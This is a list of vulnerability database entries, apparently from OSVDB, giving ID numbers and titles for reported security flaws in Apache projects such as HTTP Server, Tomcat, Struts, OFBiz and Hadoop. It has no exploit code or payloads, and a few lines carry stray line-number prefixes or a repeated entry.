| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
| [86901] Apache Tomcat Error Message Path Disclosure
| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
| [85430] Apache mod_pagespeed Module Unspecified XSS
| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
| [85249] Apache Wicket Unspecified XSS
| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
| [83339] Apache Roller Blogger Roll Unspecified XSS
| [83270] Apache Roller Unspecified Admin Action CSRF
| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
| [59019] Apache mod_python Cookie Salting Weakness
| [59018] Apache Harmony Error Message Handling Overflow
| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
| [59010] Apache Solr get-file.jsp XSS
| [59009] Apache Solr action.jsp XSS
| [59008] Apache Solr analysis.jsp XSS
| [59007] Apache Solr schema.jsp Multiple Parameter XSS
| [59006] Apache Beehive select / checkbox Tag XSS
| [59005] Apache Beehive jpfScopeID Global Parameter XSS
| [59004] Apache Beehive Error Message XSS
| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
| [59002] Apache Jetspeed default-page.psml URI XSS
| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
| [59000] Apache CXF Unsigned Message Policy Bypass
| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
| [58993] Apache Hadoop browseBlock.jsp XSS
| [58991] Apache Hadoop browseDirectory.jsp XSS
| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
8447| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
8448| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
8449| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
8450| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
8451| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
8452| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
8453| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
8454| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
8455| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
8456| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
8457| [58805] Apache Derby Unauthenticated Database / Admin Access
8458| [58804] Apache Wicket Header Contribution Unspecified Issue
8459| [58803] Apache Wicket Session Fixation
8460| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
8461| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
8462| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
8463| [58799] Apache Tapestry Logging Cleartext Password Disclosure
8464| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
8465| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
8466| [58796] Apache Jetspeed Unsalted Password Storage Weakness
8467| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
8468| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
8469| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
8470| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
8471| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
8472| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
8473| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
8474| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
8475| [58775] Apache JSPWiki preview.jsp action Parameter XSS
8476| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8477| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
8478| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
8479| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
8480| [58770] Apache JSPWiki Group.jsp group Parameter XSS
8481| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
8482| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
8483| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
8484| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
8485| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8486| [58763] Apache JSPWiki Include Tag Multiple Script XSS
8487| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
8488| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
8489| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
8490| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
8491| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
8492| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
8493| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
8494| [58755] Apache Harmony DRLVM Non-public Class Member Access
8495| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
8496| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
8497| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
8498| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
8499| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
8500| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
8501| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
8502| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
8503| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
8504| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
8505| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
8506| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
8507| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
8508| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
8509| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
8510| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
8511| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
8512| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
8513| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
8514| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
8515| [58725] Apache Tapestry Basic String ACL Bypass Weakness
8516| [58724] Apache Roller Logout Functionality Failure Session Persistence
8517| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
8518| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
8519| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
8520| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
8521| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
8522| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
8523| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
8524| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
8525| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
8526| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
8527| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
8528| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
8529| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
8530| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
8531| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
8532| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
8533| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
8534| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
8535| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
8536| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
8537| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
8538| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
8539| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
8540| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
8541| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
8542| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
8543| [58687] Apache Axis Invalid wsdl Request XSS
8544| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
8545| [58685] Apache Velocity Template Designer Privileged Code Execution
8546| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
8547| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
8548| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
8549| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
8550| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
8551| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
8552| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
8553| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
